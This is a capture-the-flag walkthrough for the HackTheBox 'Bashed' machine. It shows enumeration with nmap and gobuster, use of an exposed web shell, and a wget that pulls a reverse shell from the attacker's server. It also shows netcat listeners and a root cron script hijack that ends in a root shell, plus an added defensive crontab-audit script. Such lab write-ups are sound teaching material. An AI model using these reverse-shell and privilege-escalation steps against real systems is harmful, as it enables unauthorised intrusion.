In my first article, I'll explain in detail the process of gaining root access to the "Bashed" machine.
Based on the scores given by HackTheBox users, we can say that this machine is on the easier side of the difficulty scale.
As always, we start by checking the Nmap scan results:
root@attacker:~# nmap -A -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 07:43 GMT
Nmap scan report for 10.10.10.68
Host is up (0.14s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Nmap done: 1 IP address (1 host up) scanned in 29.56 seconds
After the quick scan of the default 1000 ports, I started a full port scan (1-65535) to make sure no other service was listening on any port. This machine runs only a web service on port 80, so the next step is to brute-force directories with DirBuster (which comes with a GUI), GoBuster or dirb. Here, I used gobuster.
When we visit the website, we find several posts about the development of phpbash. You can access the phpbash script as well as the GitHub repository of Arrexel, who created both phpbash and this machine. If you review the code on GitHub, you will see that this single phpbash file is a standalone, semi-interactive web shell, which makes it an excellent attack surface. Now, let's see what we got with GoBuster.
gobuster -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
In the gobuster command:
- -x specifies the file extensions to append to each word,
- -w specifies the wordlist you want to use.
(Newer gobuster releases put directory brute-forcing behind the dir subcommand, i.e. gobuster dir -u ..., with the same options.)
According to the GoBuster results, several files and script directories can be seen under the web root, such as the "/uploads", "/php" and "/dev" folders. In the root directory we see an index page and cannot list files. In the "dev" directory, however, directory listing is enabled and we can see phpbash.php, which is what we are looking for.
First, let's learn the user and group IDs by running the id command. Then, we will check whether we have permission to access the /home directory and read the user.txt flag.
www-data@bashed:/var/www/html/dev# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/dev# cd /home
www-data@bashed:/home# ls
arrexel
scriptmanager
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# ls -la
total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec  4  2017 .
drwxr-xr-x 4 root    root    4096 Dec  4  2017 ..
-rw------- 1 arrexel arrexel    1 Dec 23  2017 .bash_history
-rw-r--r-- 1 arrexel arrexel  220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec  4  2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec  4  2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec  4  2017 .nano
-rw-r--r-- 1 arrexel arrexel  655 Dec  4  2017 .profile
-rw-r--r-- 1 arrexel arrexel    0 Dec  4  2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel   33 Dec  4  2017 user.txt
www-data@bashed:/home/arrexel# cat user.txt
JACKPOT. You have found user.txt :)
Before the privilege escalation part, let's open a reverse shell in addition to the web shell. In the following sections, I will explain why it is better to have a reverse shell. First, you can download the PHP tiny reverse shell I have shared on my GitHub.
Don't forget to edit the 10.10.10.10 IP and 1234 port placeholders in the reverseshell.php file.
From the web shell we can see that www-data has write permission on the /var/www/html/uploads directory. We can place reverseshell.php there and then trigger it by requesting it in the browser.
Let's use our favourite Python module, the one we use almost all the time to serve files: SimpleHTTPServer.
root@attacker:~/Desktop/bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Navigate to http://10.10.10.68/dev/phpbash.php and fetch the file into the uploads directory:
www-data@bashed:/var/www/html/uploads# wget http://10.10.X.21/reverseshell.php
--2019-02-19 00:27:25--  http://10.10.X.21/reverseshell.php
Connecting to 10.10.X.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 72 [application/octet-stream]
Saving to: 'reverseshell.php'

     0K                                                       100% 14.0M=0s

2019-02-19 00:27:25 (14.0 MB/s) - 'reverseshell.php' saved [72/72]
Let's set up a netcat listener on our local machine as given below.
root@attacker:~/Desktop/bashed# nc -nvlp 1234
listening on [any] 1234 ...
Then request reverseshell.php from the uploads directory in the browser; when you check your nc listener:
root@attacker:~/Desktop/bashed# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.X.21] from (UNKNOWN) [10.10.10.68] 37420
bash: cannot set terminal process group (743): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bashed:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/uploads$
To get a more usable shell, type:
$ python -c "import pty; pty.spawn('/bin/bash');"
When we look around the root of the filesystem, we again see a number of files and directories, and one of them stands out. It says "Enumerate More..."
www-data@bashed:/$ ls -la
ls -la
total 88
drwxr-xr-x  23 root          root           4096 Dec  4  2017 .
drwxr-xr-x  23 root          root           4096 Dec  4  2017 ..
drwxr-xr-x   2 root          root           4096 Dec  4  2017 bin
drwxr-xr-x   3 root          root           4096 Dec  4  2017 boot
drwxr-xr-x  19 root          root           4240 Feb 17 22:14 dev
drwxr-xr-x  89 root          root           4096 Dec  4  2017 etc
drwxr-xr-x   4 root          root           4096 Dec  4  2017 home
lrwxrwxrwx   1 root          root             32 Dec  4  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root           4096 Dec  4  2017 lib
drwxr-xr-x   2 root          root           4096 Dec  4  2017 lib64
drwx------   2 root          root          16384 Dec  4  2017 lost+found
drwxr-xr-x   4 root          root           4096 Dec  4  2017 media
drwxr-xr-x   2 root          root           4096 Feb 15  2017 mnt
drwxr-xr-x   2 root          root           4096 Dec  4  2017 opt
dr-xr-xr-x 121 root          root              0 Feb 17 22:14 proc
drwx------   3 root          root           4096 Dec  4  2017 root
drwxr-xr-x  18 root          root            520 Feb 18 06:25 run
drwxr-xr-x   2 root          root           4096 Dec  4  2017 sbin
drwxrwxr--   2 scriptmanager scriptmanager  4096 Dec  4  2017 scripts
drwxr-xr-x   2 root          root           4096 Feb 15  2017 srv
dr-xr-xr-x  13 root          root              0 Feb 17 22:14 sys
drwxrwxrwt  10 root          root           4096 Feb 19 00:48 tmp
drwxr-xr-x  10 root          root           4096 Dec  4  2017 usr
drwxr-xr-x  12 root          root           4096 Dec  4  2017 var
lrwxrwxrwx   1 root          root             29 Dec  4  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
www-data@bashed:/$ cd scrpits
cd scrpits
bash: cd: scrpits: No such file or directory
www-data@bashed:/$ cd scripts
cd scripts
bash: cd: scripts: Permission denied
www-data@bashed:/$ ls -la scripts
ls -la scripts
ls: cannot access 'scripts/..': Permission denied
ls: cannot access 'scripts/test.py': Permission denied
ls: cannot access 'scripts/test.txt': Permission denied
ls: cannot access 'scripts/.': Permission denied
total 0
d????????? ? ? ? ? ?            .
d????????? ? ? ? ? ?            ..
-????????? ? ? ? ? ?            test.py
-????????? ? ? ? ? ?            test.txt
Well well well, we have an interesting directory here: "/scripts", owned by scriptmanager. Its mode is rwxrwxr--, so as www-data we have read but not execute permission on it: we can list the file names, but we cannot enter the directory or read the files themselves.
www-data@bashed:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
We can see that the www-data user can run any command as scriptmanager, without a password.
www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$
Let’s get back to "/scripts" directory.
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Feb 19 01:58 test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing
scriptmanager@bashed:/scripts$
As can be seen, test.py simply writes the string from the script into test.txt. The important point is that test.txt is owned by root, while the owner of test.py is scriptmanager, and the timestamp on test.txt changes every minute. This strongly suggests that a cron job running as root executes test.py every minute. Since scriptmanager can edit test.py, you can reach the root.txt flag by editing the script, or get a root reverse shell with netcat.
You can use the Python reverse shell from pentestmonkey. Let's edit the test.py file and change the IP and PORT to your own. Link.
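The weakness above, a root cron job executing a script that a less-privileged user owns, is easy to check for from the administrator's side. The audit below is an added example, not code from the page or the box: the crontab line is an assumption (the page only infers the job from test.txt's timestamps), and the fake inode table is constructed, with /scripts and test.py mirroring the ownership shown in the listing.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample crontab; the root job for test.py is assumed, not taken from the box.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
* * * * * root python /scripts/test.py
0 3 * * * root /usr/local/bin/backup.sh
"""

# Constructed fake inode table: path -> (owner uid, permission bits).
# /scripts and test.py mirror the page's listing: owned by scriptmanager (uid assumed 1001).
FAKE_FS: Dict[str, Tuple[int, int]] = {
    "/scripts": (1001, 0o774),
    "/scripts/test.py": (1001, 0o644),
    "/usr/local/bin": (0, 0o755),
    "/usr/local/bin/backup.sh": (0, 0o755),
}

CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
INTERPRETERS = ("python", "python2", "python3", "sh", "bash", "perl")


def script_path(cmd: str) -> Optional[str]:
    """Return the first absolute path in the command that is not an interpreter binary."""
    for tok in cmd.split():
        if os.path.basename(tok) in INTERPRETERS:
            continue
        return tok if tok.startswith("/") else None
    return None


def audit_crontab(text: str, lookup: Callable[[str], Optional[Tuple[int, int]]]) -> List[Tuple[str, str]]:
    """Flag root cron jobs whose script, or its parent directory, a non-root user could change."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line.strip())
        if line.strip().startswith("#") or not m or m.group("user") != "root":
            continue
        path = script_path(m.group("cmd"))
        if path is None:
            continue
        for p in (path, os.path.dirname(path)):  # the directory matters: it allows file replacement
            info = lookup(p)
            if info is None:
                findings.append((p, "missing"))
            elif info[0] != 0:
                findings.append((p, "owned by uid %d, not root" % info[0]))
            elif info[1] & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((p, "group/world writable (%s)" % oct(info[1])))
    return findings


def real_lookup(path: str) -> Optional[Tuple[int, int]]:
    """Lookup backed by the live filesystem, to run the audit on a real host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)


if __name__ == "__main__":
    for p, why in audit_crontab(SAMPLE_CRONTAB, FAKE_FS.get):
        print("RISK: %s is %s" % (p, why))
```

On a real host, pass the contents of /etc/crontab and the files under /etc/cron.d with real_lookup instead of FAKE_FS.get.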
Set up your netcat listener:
root@attacker:~# nc -lnvp 1453
listening on [any] 1453 ...
connect to [10.10.x.21] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root